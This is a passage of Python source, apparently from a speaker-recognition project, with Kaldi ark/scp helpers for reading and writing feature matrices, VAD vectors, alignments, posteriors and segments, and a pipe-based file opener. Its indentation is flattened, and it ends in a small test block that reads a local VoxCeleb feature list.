def close(self):
for name in self.fd:
self.fd[name].close()
for name in self.vad_fd:
self.vad_fd[name].close()
for name in self.ali_fd:
self.ali_fd[name].close()
def read_segment(self, filename, length=None, shuffle=False, start=None):
""" [mat, vad, ali, start_point] = read_segment(file_or_fd)
filename : The filename we want to load.
In order to load vad.scp and pdf.scp as well as feats.scp, we need the name of the feature.
Unlike FeatureReader, the filename should not contain offset.
The feaure expansion is applied. The returned feature will be longer than the specified length.
"""
utt = filename
feats_filename, feats_offset = self.utt2feats_offset[utt]
if feats_filename not in self.fd:
fd = open(feats_filename, 'rb')
assert fd is not None
self.fd[feats_filename] = fd
# Load the features
self.fd[feats_filename].seek(feats_offset)
try:
binary = self.fd[feats_filename].read(2).decode()
num_features = self.utt2num_frames[utt]
if binary == '\0B':
# Do we need to load the entire recording?
if length is not None:
# The length is specified
if start is None:
# If the length is too long, clip it to #frames
length = num_features if length > num_features else length
if shuffle:
start = random.randint(0, num_features-1)
if start + length > num_features:
start = num_features - length
real_start = start - self.left_context
real_length = length + self.left_context + self.right_context
else:
# Load from the very beginning
start = 0
real_start = start - self.left_context
real_length = length + self.left_context + self.right_context
else:
assert not shuffle, "The start point is specified, thus shuffling is invalid."
if start + length > num_features:
# The length is too long that we should shorten it.
length = num_features - start
# The left_context is considered
real_start = start - self.left_context
real_length = length + self.left_context + self.right_context
else:
# We want the entire utterance
start = 0
length = num_features
real_start = start - self.left_context
real_length = length + self.left_context + self.right_context
# Load the feature using real_start and real_length
# Note: The real_start can be < 0 and the real_length can be > num_features
# Do feature expansion if that happens.
tmp_start = max(real_start, 0)
tmp_end = min(real_start + real_length, num_features)
mat = _read_submat_binary(self.fd[feats_filename], tmp_start, tmp_end - tmp_start)
if real_start < 0:
# Left expansion
left_mat = np.tile(mat[0, :], [-real_start, 1])
mat = np.concatenate([left_mat, mat], axis=0)
if real_start + real_length > num_features:
# Right expansion
right_mat = np.tile(mat[-1, :], [real_start + real_length - num_features, 1])
mat = np.concatenate([mat, right_mat], axis=0)
assert(mat.shape[0] == real_length)
else:
raise IOError("Cannot read features from %s" % feats_filename)
except:
raise IOError("Cannot read features from %s" % feats_filename)
# start, length are got from the feature loading.from
# Use them in the vad and alignment loading.
vad_filename, vad_offset = self.utt2vad_offset[utt]
if vad_filename not in self.vad_fd:
vad_fd = open(vad_filename, 'rb')
assert vad_fd is not None
self.vad_fd[vad_filename] = vad_fd
# Load the vad
self.vad_fd[vad_filename].seek(vad_offset)
try:
binary = self.vad_fd[vad_filename].read(2).decode()
if binary == '\0B': # binary flag
vad = _read_subvec_flt_binary(self.vad_fd[vad_filename], start, length)
else: # ascii,
raise IOError("Cannot read vad from %s" % vad_filename)
except:
raise IOError("Cannot read vad from %s" % vad_filename)
# Use start, length to load alignment
ali_filename, ali_offset = self.utt2ali_offset[utt]
if ali_filename not in self.ali_fd:
ali_fd = open(ali_filename, 'rb')
assert ali_fd is not None
self.ali_fd[ali_filename] = ali_fd
# Load the alignment
self.ali_fd[ali_filename].seek(ali_offset)
try:
binary = self.ali_fd[ali_filename].read(2).decode()
if binary == '\0B': # binary flag
ali = _read_subvec_int_binary(self.ali_fd[ali_filename], start, length)
else: # ascii,
raise IOError("Cannot read ali from %s" % ali_filename)
except:
raise IOError("Cannot read ali from %s" % ali_filename)
assert(mat.shape[0] == vad.shape[0] + self.left_context + self.right_context and
mat.shape[0] == ali.shape[0] + self.left_context + self.right_context)
return mat, vad, ali, start
#################################################
# Data-type independent helper functions,
def open_or_fd(file, mode='rb'):
""" fd = open_or_fd(file)
Open file, gzipped file, pipe, or forward the file-descriptor.
Eventually seeks in the 'file' argument contains ':offset' suffix.
"""
offset = None
try:
# strip 'ark:' prefix from r{x,w}filename (optional),
if re.search('^(ark|scp)(,scp|,b|,t|,n?f|,n?p|,b?o|,n?s|,n?cs)*:', file):
(prefix,file) = file.split(':',1)
# separate offset from filename (optional),
if re.search(':[0-9]+$', file):
(file,offset) = file.rsplit(':',1)
# input pipe?
if file[-1] == '|':
fd = popen(file[:-1], 'rb') # custom,
# output pipe?
elif file[0] == '|':
fd = popen(file[1:], 'wb') # custom,
# is it gzipped?
elif file.split('.')[-1] == 'gz':
fd = gzip.open(file, mode)
# a normal file...
else:
fd = open(file, mode)
except TypeError:
# 'file' is opened file descriptor,
fd = file
# Eventually seek to offset,
if offset != None: fd.seek(int(offset))
return fd
# based on '/usr/local/lib/python3.4/os.py'
def popen(cmd, mode="rb"):
if not isinstance(cmd, str):
raise TypeError("invalid cmd type (%s, expected string)" % type(cmd))
import subprocess, io, threading
# cleanup function for subprocesses,
def cleanup(proc, cmd):
ret = proc.wait()
if ret > 0:
raise SubprocessFailed('cmd %s returned %d !' % (cmd,ret))
return
# text-mode,
if mode == "r":
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return io.TextIOWrapper(proc.stdout)
elif mode == "w":
proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return io.TextIOWrapper(proc.stdin)
# binary,
elif mode == "rb":
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return proc.stdout
elif mode == "wb":
proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return proc.stdin
# sanity,
else:
raise ValueError("invalid mode %s" % mode)
def read_key(fd):
""" [key] = read_key(fd)
Read the utterance-key from the opened ark/stream descriptor 'fd'.
"""
key = ''
while 1:
char = fd.read(1).decode("latin1")
if char == '' : break
if char == ' ' : break
key += char
key = key.strip()
if key == '': return None # end of file,
assert(re.match('^\S+$',key) != None) # check format (no whitespace!)
return key
#################################################
# Integer vectors (alignments, ...),
def read_ali_ark(file_or_fd):
""" Alias to 'read_vec_int_ark()' """
return read_vec_int_ark(file_or_fd)
def read_vec_int_ark(file_or_fd):
""" generator(key,vec) = read_vec_int_ark(file_or_fd)
Create generator of (key,vector<int>) tuples, which reads from the ark file/stream.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Read ark to a 'dictionary':
d = { u:d for u,d in kaldi_io.read_vec_int_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
ali = read_vec_int(fd)
yield key, ali
key = read_key(fd)
finally:
if fd is not file_or_fd: fd.close()
def read_vec_int(file_or_fd):
""" [int-vec] = read_vec_int(file_or_fd)
Read kaldi integer vector, ascii or binary input,
"""
fd = open_or_fd(file_or_fd)
binary = fd.read(2).decode()
if binary == '\0B': # binary flag
assert(fd.read(1).decode() == '\4'); # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # vector dim
# Elements from int32 vector are sored in tuples: (sizeof(int32), value),
vec = np.frombuffer(fd.read(vec_size*5), dtype=[('size','int8'),('value','int32')], count=vec_size)
assert(vec[0]['size'] == 4) # int32 size,
ans = vec[:]['value'] # values are in 2nd column,
else: # ascii,
arr = (binary + fd.readline().decode()).strip().split()
try:
arr.remove('['); arr.remove(']') # optionally
except ValueError:
pass
ans = np.array(arr, dtype=int)
if fd is not file_or_fd : fd.close() # cleanup
return ans
def _read_subvec_int_binary(fd, start, length):
assert (fd.read(1).decode() == '\4') # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # vector dim
assert start + length <= vec_size
if start > 0:
fd.seek(start * 5, 1)
# Elements from int32 vector are sored in tuples: (sizeof(int32), value),
vec = np.frombuffer(fd.read(length * 5), dtype=[('size', 'int8'), ('value', 'int32')], count=length)
assert (vec[0]['size'] == 4) # int32 size,
ans = vec[:]['value'] # values are in 2nd column,
return ans
# Writing,
def write_vec_int(file_or_fd, v, key=''):
""" write_vec_int(f, v, key='')
Write a binary kaldi integer vector to filename or stream.
Arguments:
file_or_fd : filename or opened file descriptor for writing,
v : the vector to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the vector.
Example of writing single vector:
kaldi_io.write_vec_int(filename, vec)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,vec in dict.iteritems():
kaldi_io.write_vec_flt(f, vec, key=key)
"""
fd = open_or_fd(file_or_fd, mode='wb')
if sys.version_info[0] == 3: assert(fd.mode == 'wb')
try:
if key != '' : fd.write((key+' ').encode("latin1")) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# dim,
fd.write('\4'.encode()) # int32 type,
fd.write(struct.pack(np.dtype('int32').char, v.shape[0]))
# data,
for i in range(len(v)):
fd.write('\4'.encode()) # int32 type,
fd.write(struct.pack(np.dtype('int32').char, v[i])) # binary,
finally:
if fd is not file_or_fd : fd.close()
#################################################
# Float vectors (confidences, ivectors, ...),
# Reading,
def read_vec_flt_scp(file_or_fd):
""" generator(key,mat) = read_vec_flt_scp(file_or_fd)
Returns generator of (key,vector) tuples, read according to kaldi scp.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the scp:
for key,vec in kaldi_io.read_vec_flt_scp(file):
...
Read scp to a 'dictionary':
d = { key:mat for key,mat in kaldi_io.read_mat_scp(file) }
"""
fd = open_or_fd(file_or_fd)
try:
for line in fd:
(key,rxfile) = line.decode().split(' ')
vec = read_vec_flt(rxfile)
yield key, vec
finally:
if fd is not file_or_fd : fd.close()
def read_vec_flt_ark(file_or_fd):
""" generator(key,vec) = read_vec_flt_ark(file_or_fd)
Create generator of (key,vector<float>) tuples, reading from an ark file/stream.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Read ark to a 'dictionary':
d = { u:d for u,d in kaldi_io.read_vec_flt_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
ali = read_vec_flt(fd)
yield key, ali
key = read_key(fd)
finally:
if fd is not file_or_fd: fd.close()
def read_vec_flt(file_or_fd):
""" [flt-vec] = read_vec_flt(file_or_fd)
Read kaldi float vector, ascii or binary input,
"""
fd = open_or_fd(file_or_fd)
binary = fd.read(2).decode()
if binary == '\0B': # binary flag
# Data type,
header = fd.read(3).decode()
if header == 'FV ': sample_size = 4 # floats
elif header == 'DV ': sample_size = 8 # doubles
else: raise UnknownVectorHeader("The header contained '%s'" % header)
assert(sample_size > 0)
# Dimension,
assert(fd.read(1).decode() == '\4'); # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # vector dim
# Read whole vector,
buf = fd.read(vec_size * sample_size)
if sample_size == 4 : ans = np.frombuffer(buf, dtype='float32')
elif sample_size == 8 : ans = np.frombuffer(buf, dtype='float64')
else : raise BadSampleSize
return ans
else: # ascii,
arr = (binary + fd.readline().decode()).strip().split()
try:
arr.remove('['); arr.remove(']') # optionally
except ValueError:
pass
ans = np.array(arr, dtype=float)
if fd is not file_or_fd : fd.close() # cleanup
return ans
def _read_subvec_flt_binary(fd, start, length):
# Data type,
header = fd.read(3).decode()
if header == 'FV ':
sample_size = 4 # floats
elif header == 'DV ':
sample_size = 8 # doubles
else:
raise UnknownVectorHeader("The header contained '%s'" % header)
assert (sample_size > 0)
# Dimension,
assert (fd.read(1).decode() == '\4') # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # vector dim
assert start + length <= vec_size
# seek from the current position
if start > 0:
fd.seek(start * sample_size, 1)
buf = fd.read(length * sample_size)
if sample_size == 4:
ans = np.frombuffer(buf, dtype='float32')
elif sample_size == 8:
ans = np.frombuffer(buf, dtype='float64')
else:
raise BadSampleSize
return ans
# Writing,
def write_vec_flt(file_or_fd, v, key=''):
""" write_vec_flt(f, v, key='')
Write a binary kaldi vector to filename or stream. Supports 32bit and 64bit floats.
Arguments:
file_or_fd : filename or opened file descriptor for writing,
v : the vector to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the vector.
Example of writing single vector:
kaldi_io.write_vec_flt(filename, vec)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,vec in dict.iteritems():
kaldi_io.write_vec_flt(f, vec, key=key)
"""
fd = open_or_fd(file_or_fd, mode='wb')
if sys.version_info[0] == 3: assert(fd.mode == 'wb')
try:
if key != '' : fd.write((key+' ').encode("latin1")) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# Data-type,
if v.dtype == 'float32': fd.write('FV '.encode())
elif v.dtype == 'float64': fd.write('DV '.encode())
else: raise UnsupportedDataType("'%s', please use 'float32' or 'float64'" % v.dtype)
# Dim,
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, v.shape[0])) # dim
# Data,
fd.write(v.tobytes())
finally:
if fd is not file_or_fd : fd.close()
#################################################
# Float matrices (features, transformations, ...),
# Reading,
def read_mat_scp(file_or_fd):
""" generator(key,mat) = read_mat_scp(file_or_fd)
Returns generator of (key,matrix) tuples, read according to kaldi scp.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the scp:
for key,mat in kaldi_io.read_mat_scp(file):
...
Read scp to a 'dictionary':
d = { key:mat for key,mat in kaldi_io.read_mat_scp(file) }
"""
fd = open_or_fd(file_or_fd)
try:
for line in fd:
(key,rxfile) = line.decode().split(' ')
mat = read_mat(rxfile)
yield key, mat
finally:
if fd is not file_or_fd : fd.close()
def read_mat_ark(file_or_fd):
""" generator(key,mat) = read_mat_ark(file_or_fd)
Returns generator of (key,matrix) tuples, read from ark file/stream.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the ark:
for key,mat in kaldi_io.read_mat_ark(file):
...
Read ark to a 'dictionary':
d = { key:mat for key,mat in kaldi_io.read_mat_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
mat = read_mat(fd)
yield key, mat
key = read_key(fd)
finally:
if fd is not file_or_fd : fd.close()
def read_mat(file_or_fd):
""" [mat] = read_mat(file_or_fd)
Reads single kaldi matrix, supports ascii and binary.
file_or_fd : file, gzipped file, pipe or opened file descriptor.
"""
fd = open_or_fd(file_or_fd)
try:
binary = fd.read(2).decode()
if binary == '\0B' :
mat = _read_mat_binary(fd)
else:
assert(binary == ' [')
mat = _read_mat_ascii(fd)
finally:
if fd is not file_or_fd: fd.close()
return mat
def _read_mat_binary(fd):
# Data type
header = fd.read(3).decode()
# 'CM', 'CM2', 'CM3' are possible values,
if header.startswith('CM'): return _read_compressed_mat(fd, header)
elif header == 'FM ': sample_size = 4 # floats
elif header == 'DM ': sample_size = 8 # doubles
else: raise UnknownMatrixHeader("The header contained '%s'" % header)
assert(sample_size > 0)
# Dimensions
s1, rows, s2, cols = np.frombuffer(fd.read(10), dtype='int8,int32,int8,int32', count=1)[0]
# Read whole matrix
buf = fd.read(rows * cols * sample_size)
if sample_size == 4 : vec = np.frombuffer(buf, dtype='float32')
elif sample_size == 8 : vec = np.frombuffer(buf, dtype='float64')
else : raise BadSampleSize
mat = np.reshape(vec,(rows,cols))
return mat
def _read_submat_binary(fd, start, length):
# Data type
header = fd.read(3).decode()
# 'CM', 'CM2', 'CM3' are possible values,
if header.startswith('CM'): return _read_compressed_submat(fd, header, start, length)
else:
raise ValueError("The features should be in the compressed format.")
def _read_mat_ascii(fd):
rows = []
while 1:
line = fd.readline().decode()
if (len(line) == 0) : raise BadInputFormat # eof, should not happen!
if len(line.strip()) == 0 : continue # skip empty line
arr = line.strip().split()
if arr[-1] != ']':
rows.append(np.array(arr,dtype='float32')) # not last line
else:
rows.append(np.array(arr[:-1],dtype='float32')) # last line
mat = np.vstack(rows)
return mat
def _read_compressed_mat(fd, format):
""" Read a compressed matrix,
see: https://github.com/kaldi-asr/kaldi/blob/master/src/matrix/compressed-matrix.h
methods: CompressedMatrix::Read(...), CompressedMatrix::CopyToMat(...),
"""
assert(format == 'CM ') # The formats CM2, CM3 are not supported...
# Format of header 'struct',
global_header = np.dtype([('minvalue','float32'),('range','float32'),('num_rows','int32'),('num_cols','int32')]) # member '.format' is not written,
per_col_header = np.dtype([('percentile_0','uint16'),('percentile_25','uint16'),('percentile_75','uint16'),('percentile_100','uint16')])
# Mapping for percentiles in col-headers,
def uint16_to_float(value, min, range):
return np.float32(min + range * 1.52590218966964e-05 * value)
# Mapping for matrix elements,
def uint8_to_float_v2(vec, p0, p25, p75, p100):
# Split the vector by masks,
mask_0_64 = (vec <= 64);
mask_65_192 = np.all([vec>64, vec<=192], axis=0);
mask_193_255 = (vec > 192);
# Sanity check (useful but slow...),
# assert(len(vec) == np.sum(np.hstack([mask_0_64,mask_65_192,mask_193_255])))
# assert(len(vec) == np.sum(np.any([mask_0_64,mask_65_192,mask_193_255], axis=0)))
# Build the float vector,
ans = np.empty(len(vec), dtype='float32')
ans[mask_0_64] = p0 + (p25 - p0) / 64. * vec[mask_0_64]
ans[mask_65_192] = p25 + (p75 - p25) / 128. * (vec[mask_65_192] - 64)
ans[mask_193_255] = p75 + (p100 - p75) / 63. * (vec[mask_193_255] - 192)
return ans
# Read global header,
globmin, globrange, rows, cols = np.frombuffer(fd.read(16), dtype=global_header, count=1)[0]
# The data is structed as [Colheader, ... , Colheader, Data, Data , .... ]
# { cols }{ size }
col_headers = np.frombuffer(fd.read(cols*8), dtype=per_col_header, count=cols)
data = np.reshape(np.frombuffer(fd.read(cols*rows), dtype='uint8', count=cols*rows), newshape=(cols,rows)) # stored as col-major,
mat = np.empty((cols,rows), dtype='float32')
for i, col_header in enumerate(col_headers):
col_header_flt = [ uint16_to_float(percentile, globmin, globrange) for percentile in col_header ]
mat[i] = uint8_to_float_v2(data[i], *col_header_flt)
return mat.T # transpose! col-major -> row-major,
def _read_compressed_submat(fd, format, start, length):
""" Read a compressed sub-matrix,
see: https://github.com/kaldi-asr/kaldi/blob/master/src/matrix/compressed-matrix.h
methods: CompressedMatrix::Read(...), CompressedMatrix::CopyToMat(...),
"""
assert(format == 'CM ') # The formats CM2, CM3 are not supported...
# Format of header 'struct',
global_header = np.dtype([('minvalue','float32'),('range','float32'),('num_rows','int32'),('num_cols','int32')]) # member '.format' is not written,
per_col_header = np.dtype([('percentile_0','uint16'),('percentile_25','uint16'),('percentile_75','uint16'),('percentile_100','uint16')])
# Mapping for percentiles in col-headers,
def uint16_to_float(value, min, range):
return np.float32(min + range * 1.52590218966964e-05 * value)
# Mapping for matrix elements,
def uint8_to_float_v2(vec, p0, p25, p75, p100):
# Split the vector by masks,
mask_0_64 = (vec <= 64);
mask_65_192 = np.all([vec>64, vec<=192], axis=0);
mask_193_255 = (vec > 192);
# Sanity check (useful but slow...),
# assert(len(vec) == np.sum(np.hstack([mask_0_64,mask_65_192,mask_193_255])))
# assert(len(vec) == np.sum(np.any([mask_0_64,mask_65_192,mask_193_255], axis=0)))
# Build the float vector,
ans = np.empty(len(vec), dtype='float32')
ans[mask_0_64] = p0 + (p25 - p0) / 64. * vec[mask_0_64]
ans[mask_65_192] = p25 + (p75 - p25) / 128. * (vec[mask_65_192] - 64)
ans[mask_193_255] = p75 + (p100 - p75) / 63. * (vec[mask_193_255] - 192)
return ans
# Read global header,
globmin, globrange, rows, cols = np.frombuffer(fd.read(16), dtype=global_header, count=1)[0]
assert rows >= (start + length), "The number of frames is not enough for length %d" % length
sub_rows = length
mat = np.zeros((cols, sub_rows), dtype='float32')
# The data is structed as [Colheader, ... , Colheader, Data, Data , .... ]
# { cols }{ size }
col_headers = np.frombuffer(fd.read(cols*8), dtype=per_col_header, count=cols)
col_left = 0
for i, col_header in enumerate(col_headers):
col_header_flt = [uint16_to_float(percentile, globmin, globrange) for percentile in col_header]
# Read data in col-major.
# It is not necessary to load all the data
# Seek to the start point from the current position.
fd.seek(col_left + start, 1)
data = np.frombuffer(fd.read(length), dtype='uint8', count=length)
mat[i] = uint8_to_float_v2(data, *col_header_flt)
col_left = rows - (start + length)
fd.seek(col_left, 1)
return mat.T # transpose! col-major -> row-major,
# Writing,
def write_mat(file_or_fd, m, key=''):
""" write_mat(f, m, key='')
Write a binary kaldi matrix to filename or stream. Supports 32bit and 64bit floats.
Arguments:
file_or_fd : filename of opened file descriptor for writing,
m : the matrix to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the matrix.
Example of writing single matrix:
kaldi_io.write_mat(filename, mat)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,mat in dict.iteritems():
kaldi_io.write_mat(f, mat, key=key)
"""
fd = open_or_fd(file_or_fd, mode='wb')
if sys.version_info[0] == 3: assert(fd.mode == 'wb')
try:
if key != '' : fd.write((key+' ').encode("latin1")) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# Data-type,
if m.dtype == 'float32': fd.write('FM '.encode())
elif m.dtype == 'float64': fd.write('DM '.encode())
else: raise UnsupportedDataType("'%s', please use 'float32' or 'float64'" % m.dtype)
# Dims,
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, m.shape[0])) # rows
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, m.shape[1])) # cols
# Data,
fd.write(m.tobytes())
finally:
if fd is not file_or_fd : fd.close()
#################################################
# 'Posterior' kaldi type (posteriors, confusion network, nnet1 training targets, ...)
# Corresponds to: vector<vector<tuple<int,float> > >
# - outer vector: time axis
# - inner vector: records at the time
# - tuple: int = index, float = value
#
def read_cnet_ark(file_or_fd):
""" Alias of function 'read_post_ark()', 'cnet' = confusion network """
return read_post_ark(file_or_fd)
def read_post_ark(file_or_fd):
""" generator(key,vec<vec<int,float>>) = read_post_ark(file)
Returns generator of (key,posterior) tuples, read from ark file.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Iterate the ark:
for key,post in kaldi_io.read_post_ark(file):
...
Read ark to a 'dictionary':
d = { key:post for key,post in kaldi_io.read_post_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
post = read_post(fd)
yield key, post
key = read_key(fd)
finally:
if fd is not file_or_fd: fd.close()
def read_post(file_or_fd):
""" [post] = read_post(file_or_fd)
Reads single kaldi 'Posterior' in binary format.
The 'Posterior' is C++ type 'vector<vector<tuple<int,float> > >',
the outer-vector is usually time axis, inner-vector are the records
at given time, and the tuple is composed of an 'index' (integer)
and a 'float-value'. The 'float-value' can represent a probability
or any other numeric value.
Returns vector of vectors of tuples.
"""
fd = open_or_fd(file_or_fd)
ans=[]
binary = fd.read(2).decode(); assert(binary == '\0B'); # binary flag
assert(fd.read(1).decode() == '\4'); # int-size
outer_vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # number of frames (or bins)
# Loop over 'outer-vector',
for i in range(outer_vec_size):
assert(fd.read(1).decode() == '\4'); # int-size
inner_vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # number of records for frame (or bin)
data = np.frombuffer(fd.read(inner_vec_size*10), dtype=[('size_idx','int8'),('idx','int32'),('size_post','int8'),('post','float32')], count=inner_vec_size)
assert(data[0]['size_idx'] == 4)
assert(data[0]['size_post'] == 4)
ans.append(data[['idx','post']].tolist())
if fd is not file_or_fd: fd.close()
return ans
#################################################
# Kaldi Confusion Network bin begin/end times,
# (kaldi stores CNs time info separately from the Posterior).
#
def read_cntime_ark(file_or_fd):
""" generator(key,vec<tuple<float,float>>) = read_cntime_ark(file_or_fd)
Returns generator of (key,cntime) tuples, read from ark file.
file_or_fd : file, gzipped file, pipe or opened file descriptor.
Iterate the ark:
for key,time in kaldi_io.read_cntime_ark(file):
...
Read ark to a 'dictionary':
d = { key:time for key,time in kaldi_io.read_post_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
cntime = read_cntime(fd)
yield key, cntime
key = read_key(fd)
finally:
if fd is not file_or_fd : fd.close()
def read_cntime(file_or_fd):
""" [cntime] = read_cntime(file_or_fd)
Reads single kaldi 'Confusion Network time info', in binary format:
C++ type: vector<tuple<float,float> >.
(begin/end times of bins at the confusion network).
Binary layout is '<num-bins> <beg1> <end1> <beg2> <end2> ...'
file_or_fd : file, gzipped file, pipe or opened file descriptor.
Returns vector of tuples.
"""
fd = open_or_fd(file_or_fd)
binary = fd.read(2).decode(); assert(binary == '\0B'); # assuming it's binary
assert(fd.read(1).decode() == '\4'); # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # number of frames (or bins)
data = np.frombuffer(fd.read(vec_size*10), dtype=[('size_beg','int8'),('t_beg','float32'),('size_end','int8'),('t_end','float32')], count=vec_size)
assert(data[0]['size_beg'] == 4)
assert(data[0]['size_end'] == 4)
ans = data[['t_beg','t_end']].tolist() # Return vector of tuples (t_beg,t_end),
if fd is not file_or_fd : fd.close()
return ans
#################################################
# Segments related,
#
# Segments as 'Bool vectors' can be handy,
# - for 'superposing' the segmentations,
# - for frame-selection in Speaker-ID experiments,
def read_segments_as_bool_vec(segments_file):
""" [ bool_vec ] = read_segments_as_bool_vec(segments_file)
using kaldi 'segments' file for 1 wav, format : '<utt> <rec> <t-beg> <t-end>'
- t-beg, t-end is in seconds,
- assumed 100 frames/second,
"""
segs = np.loadtxt(segments_file, dtype='object,object,f,f', ndmin=1)
# Sanity checks,
assert(len(segs) > 0) # empty segmentation is an error,
assert(len(np.unique([rec[1] for rec in segs ])) == 1) # segments with only 1 wav-file,
# Convert time to frame-indexes,
start = np.rint([100 * rec[2] for rec in segs]).astype(int)
end = np.rint([100 * rec[3] for rec in segs]).astype(int)
# Taken from 'read_lab_to_bool_vec', htk.py,
frms = np.repeat(np.r_[np.tile([False,True], len(end)), False],
np.r_[np.c_[start - np.r_[0, end[:-1]], end-start].flat, 0])
assert np.sum(end-start) == np.sum(frms)
return frms
if __name__ == "__main__":
def read(file_or_fd, length=None, shuffle=False):
""" [mat] = read_mat(file_or_fd)
Reads single kaldi matrix, supports ascii and binary.
file_or_fd : file, gzipped file, pipe or opened file descriptor.
In our case, file_or_fd can only be a filename with offset. We will save the fd after opening it.
"""
(filename, offset) = file_or_fd.rsplit(":", 1)
fd = open(filename, 'rb')
fd.seek(int(offset))
binary = fd.read(2).decode()
if binary == '\0B':
mat, time1, time2, time3 = read_mat_binary(fd)
else:
pass
if length is not None:
num_features = mat.shape[0]
length = num_features if length > num_features else length
start = random.randint(0, num_features - length) if shuffle else 0
mat = mat[start:start+length, :]
fd.close()
return mat, time1, time2, time3
def read_mat_binary(fd):
# Data type
import time
ts = time.time()
header = fd.read(3).decode()
# 'CM', 'CM2', 'CM3' are possible values,
if header.startswith('CM'):
return read_compressed_mat(fd, header)
elif header == 'FM ':
sample_size = 4 # floats
elif header == 'DM ':
sample_size = 8 # doubles
else:
raise UnknownMatrixHeader("The header contained '%s'" % header)
assert (sample_size > 0)
# Dimensions
s1, rows, s2, cols = np.frombuffer(fd.read(10), dtype='int8,int32,int8,int32', count=1)[0]
t1 = time.time() - ts
# Read whole matrix
ts = time.time()
buf = fd.read(rows * cols * sample_size)
t2 = time.time() - ts
ts = time.time()
if sample_size == 4:
vec = np.frombuffer(buf, dtype='float32')
elif sample_size == 8:
vec = np.frombuffer(buf, dtype='float64')
else:
raise BadSampleSize
mat = np.reshape(vec, (rows, cols))
t3 = time.time() - ts
return mat, t1, t2, t3
def read_compressed_mat(fd, format):
""" Read a compressed matrix,
see: https://github.com/kaldi-asr/kaldi/blob/master/src/matrix/compressed-matrix.h
methods: CompressedMatrix::Read(...), CompressedMatrix::CopyToMat(...),
"""
assert (format == 'CM ') # The formats CM2, CM3 are not supported...
# Format of header 'struct',
global_header = np.dtype([('minvalue', 'float32'), ('range', 'float32'), ('num_rows', 'int32'),
('num_cols', 'int32')]) # member '.format' is not written,
per_col_header = np.dtype([('percentile_0', 'uint16'), ('percentile_25', 'uint16'), ('percentile_75', 'uint16'),
('percentile_100', 'uint16')])
# Mapping for percentiles in col-headers,
def uint16_to_float(value, min, range):
return np.float32(min + range * 1.52590218966964e-05 * value)
# Mapping for matrix elements,
def uint8_to_float_v2(vec, p0, p25, p75, p100):
# Split the vector by masks,
mask_0_64 = (vec <= 64)
mask_65_192 = np.all([vec > 64, vec <= 192], axis=0)
mask_193_255 = (vec > 192)
# Sanity check (useful but slow...),
# assert(len(vec) == np.sum(np.hstack([mask_0_64,mask_65_192,mask_193_255])))
# assert(len(vec) == np.sum(np.any([mask_0_64,mask_65_192,mask_193_255], axis=0)))
# Build the float vector,
ans = np.empty(len(vec), dtype='float32')
ans[mask_0_64] = p0 + (p25 - p0) / 64. * vec[mask_0_64]
ans[mask_65_192] = p25 + (p75 - p25) / 128. * (vec[mask_65_192] - 64)
ans[mask_193_255] = p75 + (p100 - p75) / 63. * (vec[mask_193_255] - 192)
return ans
import time
ts = time.time()
# Read global header,
globmin, globrange, rows, cols = np.frombuffer(fd.read(16), dtype=global_header, count=1)[0]
t1 = time.time() - ts
# The data is structed as [Colheader, ... , Colheader, Data, Data , .... ]
# { cols }{ size }
ts = time.time()
col_headers = np.frombuffer(fd.read(cols * 8), dtype=per_col_header, count=cols)
data = np.reshape(np.frombuffer(fd.read(cols * rows), dtype='uint8', count=cols * rows),
newshape=(cols, rows)) # stored as col-major,
t2 = time.time() - ts
ts = time.time()
mat = np.empty((cols, rows), dtype='float32')
for i, col_header in enumerate(col_headers):
col_header_flt = [uint16_to_float(percentile, globmin, globrange) for percentile in col_header]
mat[i] = uint8_to_float_v2(data[i], *col_header_flt)
t3 = time.time() - ts
return mat.T, t1, t2, t3 # transpose! col-major -> row-major,
# data = "/home/dawna/mgb3/transcription/exp-yl695/Snst/xvector/cpdaic_1.0_50/data/voxceleb_train_combined_no_sil"
data = "/scratch/yl695/voxceleb/data/voxceleb_train_combined_no_sil"
feats_scp = []
with open(os.path.join(data, "feats.scp"), "r") as f:
for line in f.readlines():
utt, scp = line.strip().split(" ")
feats_scp.append(scp)
